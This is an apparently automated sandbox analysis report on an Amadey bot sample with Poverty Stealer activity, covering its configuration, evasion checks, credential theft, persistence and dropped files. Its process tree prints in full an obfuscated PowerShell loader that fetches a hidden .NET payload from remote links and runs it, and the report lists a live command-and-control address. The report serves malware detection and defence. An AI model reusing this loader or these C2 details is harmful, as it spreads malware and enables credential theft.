amadey | 5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14/02/2025, 02:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
Size

1.8MB
MD5

9bc4c8ecb6d8b3e6b7209067f389cea7
SHA1

e316ff6b3b8c2333e303fead5366dab17bf5bedd
SHA256

5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78
SHA512

bb6916d60a2f908b2d8c5f78fdd43b1ced93999c04699504704b98bb81798b8d6ffcaa0c9adc1666d99dc75bfb80d0804f9a4852b38115ebcabc02875f74f821
SSDEEP

49152:s7OZQKz37BVU9Fk1JByBHmv6FOxhux49lnItLO:gXKzrBX1JEVG6Qxd4O

Score

10^/10

amadey povertystealer 9c9aa5 defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00080000000194ff-35.dat	family_povertystealer

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2012	powershell.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
8	3032	skotes.exe
8	3032	skotes.exe
22	3032	skotes.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Executes dropped EXE 5 IoCs

pid	Process
3032	skotes.exe
2856	cDbFtZk.exe
1636	d2YQIJa.exe
2388	nP7zeuq.exe
2604	fp76Xtt.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe

Loads dropped DLL 7 IoCs

pid	Process
1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
3032	skotes.exe
3032	skotes.exe
3032	skotes.exe
3032	skotes.exe
3032	skotes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	fp76Xtt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
3032	skotes.exe
1636	d2YQIJa.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cDbFtZk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
3032	skotes.exe
1636	d2YQIJa.exe
1636	d2YQIJa.exe
1636	d2YQIJa.exe
1636	d2YQIJa.exe
1636	d2YQIJa.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 3032	1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe	30
PID 1924 wrote to memory of 3032	1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe	30
PID 1924 wrote to memory of 3032	1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe	30
PID 1924 wrote to memory of 3032	1924	5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe	30
PID 3032 wrote to memory of 2856	3032	skotes.exe	33
PID 3032 wrote to memory of 2856	3032	skotes.exe	33
PID 3032 wrote to memory of 2856	3032	skotes.exe	33
PID 3032 wrote to memory of 2856	3032	skotes.exe	33
PID 3032 wrote to memory of 1636	3032	skotes.exe	34
PID 3032 wrote to memory of 1636	3032	skotes.exe	34
PID 3032 wrote to memory of 1636	3032	skotes.exe	34
PID 3032 wrote to memory of 1636	3032	skotes.exe	34
PID 3032 wrote to memory of 2388	3032	skotes.exe	36
PID 3032 wrote to memory of 2388	3032	skotes.exe	36
PID 3032 wrote to memory of 2388	3032	skotes.exe	36
PID 3032 wrote to memory of 2388	3032	skotes.exe	36
PID 3032 wrote to memory of 2604	3032	skotes.exe	37
PID 3032 wrote to memory of 2604	3032	skotes.exe	37
PID 3032 wrote to memory of 2604	3032	skotes.exe	37
PID 3032 wrote to memory of 2604	3032	skotes.exe	37
PID 2604 wrote to memory of 2188	2604	fp76Xtt.exe	38
PID 2604 wrote to memory of 2188	2604	fp76Xtt.exe	38
PID 2604 wrote to memory of 2188	2604	fp76Xtt.exe	38
PID 2188 wrote to memory of 1524	2188	cmd.exe	40
PID 2188 wrote to memory of 1524	2188	cmd.exe	40
PID 2188 wrote to memory of 1524	2188	cmd.exe	40
PID 1524 wrote to memory of 2012	1524	WScript.exe	41
PID 1524 wrote to memory of 2012	1524	WScript.exe	41
PID 1524 wrote to memory of 2012	1524	WScript.exe	41

C:\Users\Admin\AppData\Local\Temp\5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe
"C:\Users\Admin\AppData\Local\Temp\5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Users\Admin\AppData\Local\Temp\1078218001\cDbFtZk.exe
    "C:\Users\Admin\AppData\Local\Temp\1078218001\cDbFtZk.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2856
- - C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1636
- - C:\Users\Admin\AppData\Local\Temp\1078612001\nP7zeuq.exe
    "C:\Users\Admin\AppData\Local\Temp\1078612001\nP7zeuq.exe"
    3⤵
    - Executes dropped EXE
    PID:2388
- - C:\Users\Admin\AppData\Local\Temp\1078683001\fp76Xtt.exe
    "C:\Users\Admin\AppData\Local\Temp\1078683001\fp76Xtt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c 1.vbs && 2.xlsx
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2188
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@GQ@ZwBk@Gs@SQBk@H@@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FY@YgBj@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1078218001\cDbFtZk.exe

Filesize
29KB

MD5
7f18339c3066f26f86954f25702bfec8

SHA1
dcc5b6acae61c49738249ec3ccf8551f6fb85461

SHA256
6e4d78e4d2eaeb25d4812bca821d5d3d39ef432cc12690e32e95cd0a715f54cd

SHA512
96d4071d5cfda6190d23fda80cbae95c180a6c85b145b2ccf687df44b09248036cfa13a13c9257bdaee03cf5a434e33db81b535baf0aeea844e3b81b3b951712

Download Submit
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe

Filesize
2.0MB

MD5
30d1c660c7505c9b470f66a6c2129b96

SHA1
fcff3478ab20b858268d1834dbf50977e6f6a9b4

SHA256
c54c305d48160cba0c1b26345ded9d609592bf829dfbd572180e10bdffda9482

SHA512
c615b4079cf94c6cb9a79338dbb40347530af7fb1205ebba2370bcbc1b1ea2d9ea6e73f60bb5d0fa132c25efb7103472365f13b2542b77eb5f8248c35ab264a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe

Filesize
288KB

MD5
c8d9061924d910d15c0a1c39d65dd57d

SHA1
d43a3cb66c206e96df85b00c0cb587a76702cc17

SHA256
21e25f1544888288783fe6b0b44078d5fc87a4c94c9a94a38614907ab58fe79d

SHA512
43abe183a9bcd2ca2471a378829133eeeb2129bdd10e73a5a1f03361fcfb9aa2614bb6b7785af9b6bf34cdff81f08cacda3c68325344bf79a1543519dbc04c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1078612001\nP7zeuq.exe

Filesize
288KB

MD5
1f844168d8a90d182cf1e0cafe7e6f2a

SHA1
f1d30df04704ede257ef3f8423cc7ac798ed3d38

SHA256
01f2986dd63419e0ad1f1da2f867a96b617fa715ec5baccc24d887e548b06768

SHA512
00dc636d9b0f18f84d50ce07ed6a8059994d6d08384619ef203a742562f303d2de14571613382954cb6ff36c71304e94a05085298c40b7b19aa97a0098359d3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1078683001\fp76Xtt.exe

Filesize
99KB

MD5
6ca1d8895e299ea630a4673213536564

SHA1
95bcbee0041ede1eaa4c13ba8a70893d61f83c84

SHA256
da620174bef1c7f41f581104a7193808d5aba54cf2edde9169c012854795e7f8

SHA512
4bee0ef4294fc73b4cd2374ea2ec443cc5f30e4e56aa1fe79049a6cf5d5229a569417f5c895e9052c8d07cab497cc325b9786a12cab9afa335502305927d96a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1.vbs

Filesize
14KB

MD5
035aad4716cbca24a191c8be5c3693d7

SHA1
a39e94785f27a4fb9d59bac8afd2d80d51bd0aac

SHA256
c93230d7d4c6cb03c59317a9d2b3d25a4e723bd677655d2cd6db8bce178a6fe4

SHA512
d070dcafba16c0597753a14a5484cb67b905474f494523750153383df68b03f74823a73a6b4a540dab49865736805c34f2f4ef7766b19c1fd4109ac985e6314b

Download Submit
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Filesize
1.8MB

MD5
9bc4c8ecb6d8b3e6b7209067f389cea7

SHA1
e316ff6b3b8c2333e303fead5366dab17bf5bedd

SHA256
5af23a870d3cc16663af13a8815a2a0fc64dde3118a3a56333e31d0fb4a07e78

SHA512
bb6916d60a2f908b2d8c5f78fdd43b1ced93999c04699504704b98bb81798b8d6ffcaa0c9adc1666d99dc75bfb80d0804f9a4852b38115ebcabc02875f74f821

Download Submit
memory/1636-70-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-74-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-72-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-67-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-63-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-76-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-78-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1636-68-0x00000000013E0000-0x000000000189C000-memory.dmp

Filesize
4.7MB

Download
memory/1924-18-0x0000000007170000-0x000000000760D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-17-0x00000000009A0000-0x0000000000E3D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-20-0x0000000007170000-0x000000000760D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-4-0x00000000009A0000-0x0000000000E3D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-3-0x00000000009A0000-0x0000000000E3D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-2-0x00000000009A1000-0x00000000009CF000-memory.dmp

Filesize
184KB

Download
memory/1924-0-0x00000000009A0000-0x0000000000E3D000-memory.dmp

Filesize
4.6MB

Download
memory/1924-1-0x00000000773C0000-0x00000000773C2000-memory.dmp

Filesize
8KB

Download
memory/2012-160-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2388-105-0x00000000002E0000-0x000000000032E000-memory.dmp

Filesize
312KB

Download
memory/2388-106-0x0000000000240000-0x0000000000288000-memory.dmp

Filesize
288KB

Download
memory/3032-65-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
4.6MB

Download
memory/3032-66-0x0000000006310000-0x00000000067CC000-memory.dmp

Filesize
4.7MB

Download
memory/3032-69-0x0000000000D10000-0x00000000011AD000-memory.dmp

Filesize
